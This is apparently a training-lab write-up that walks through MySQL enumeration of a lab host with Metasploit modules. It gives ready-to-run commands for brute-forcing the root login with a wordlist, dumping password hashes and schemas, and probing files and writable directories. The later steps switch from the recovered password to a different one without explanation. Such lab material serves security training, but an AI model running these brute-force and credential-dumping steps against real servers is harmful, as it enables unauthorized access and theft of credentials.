MySQL Enumeration
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a MySQL service will be accessible at demo.ine.local.
Objective: Your task is to run the following auxiliary modules against the target:
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login
auxiliary/admin/mysql/mysql_enum
auxiliary/admin/mysql/mysql_sql
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_hashdump
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_writable_dirs
Tools
The best tools for this lab are:
Nmap
Metasploit Framework
Writeup
auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_version
set RHOSTS demo.ine.local
run
auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS demo.ine.local
set USERNAME root
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set STOP_ON_SUCCESS true
run
auxiliary/admin/mysql/mysql_enum
use auxiliary/admin/mysql/mysql_enum
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD twinkle
run
auxiliary/admin/mysql/mysql_sql
use auxiliary/admin/mysql/mysql_sql
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD twinkle
set SQL "SHOW DATABASES;"
run
auxiliary/scanner/mysql/mysql_file_enum
use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD twinkle
set FILE_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
set VERBOSE true
run
auxiliary/scanner/mysql/mysql_hashdump
use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD twinkle
run
auxiliary/scanner/mysql/mysql_schemadump
use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD password
run
auxiliary/scanner/mysql/mysql_writable_dirs
use auxiliary/scanner/mysql/mysql_writable_dirs
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD password
set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
run
Last updated